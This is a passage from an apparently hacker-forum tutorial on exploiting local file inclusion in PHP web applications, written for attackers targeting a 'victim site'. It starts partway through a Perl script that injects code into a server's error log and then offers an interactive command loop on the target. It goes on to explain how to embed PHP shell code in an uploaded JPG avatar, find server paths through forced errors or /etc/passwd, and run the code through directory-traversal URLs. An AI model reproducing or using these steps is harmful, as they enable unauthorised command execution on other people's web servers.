Code $code sucssefully injected in $log
";

print "
Type command to run or exit to end: ";
$cmd = ;

while($cmd !~ "exit") {

$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site", PeerPort=>"80") or die "
Connection Failed.

";
print $socket "GET ".$path."index.php=".$log."&cmd=$cmd HTTP/1.1
";
print $socket "Host: ".$site."
";
print $socket "Accept: */*
";
print $socket "Connection: close

";

while ($show = <$socket>)
{
print $show;
}

print "Type command to run or exit to end: ";
$cmd = ;
}
Copy/paste that, save it as whatever.pl and change what is in bold accordingly to your victim site. If the vulnerable code is in victim.com/main/test.php you should change the /folder/ to /main/ , index.php= to test.php= and the ../../../../../../../etc/httpd/logs/error_log to where the log is at!

That script will inject the code and then will ask you for a command to run on the server! You know what to do now!

Last but not least we will take a look on how to use the avatar/image upload funtion found in a lot of web aplications.
You possibly have seen this in the "Local JPG Shell injection video" at milw0rm, but the best part here that was not mentioned is that the web aplication DOES N'T need to be installed on your victim website!

This is a quick explanation, for a better understanding you can view the video at :
Code:
http://www.milw0rm.com/video/watch.php?id=57
OR, IF you want a private way to upload shell in the server visit this link :
Code:
http://per1ova.com/showthread.php?t=400
This article is in the PREMIUM AREA so you need to be a VIP member

You need to "insert" the php code you want to execute inside the image, to do this you'll need to use your favorite hex editor or you can use the edjpgcom program (all you need to do is right click on the image, open with..., then select the edjpgcom program and then just type the code). Ok now that you have your shell in the image all you need to do is upload it! If your victim.com has a forum or something else that allows you to upload great, if not check if its in a shared hosting, if so do a reverse lookup on it!

Now that you have a list of potential sites that may have a forum or something else that allows you to upload your image all you need to do is take some time to browse thru them until you find one!

After you found one and have uploaded your image here is tricky part, you'll need to "create" an error on it (in order to find the server path to it)! Try per example create an mysql error and you will get something like this:
Code:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/sitefolder/public_html/includes/view.php on line 37
If you can't force an error go back to the etc/passwd file:

Code:
username:kbeMVnZM0oL7I:503:100:FullName:/home/username:/bin/sh
As you can see the username is also the directory name, most of the times the name is similar to the domain name, but if not the case you'll have to try them until you find the one you're looking for!

Go to your avatar image right click on it and then properties (write down the path to it), you'll now all set up.

In your browser type this (again, the nr of ../ may vary):
Code:
victim.com/index.php=../../../../../../../../../ho me/the_other_site_dir/public_html/path_to_your_avatar/avatar.jpg
In order "words" should look like this (using fictitious "names"):

Code:
victim.com/index.php=../../../../../../../../../ho me/arcfull/public_html/forum/uploads/avatar.jpg
After you type this you will see the result of the code inserted in the image!

https://per1ova.startlogic.com/showthread.php?t=595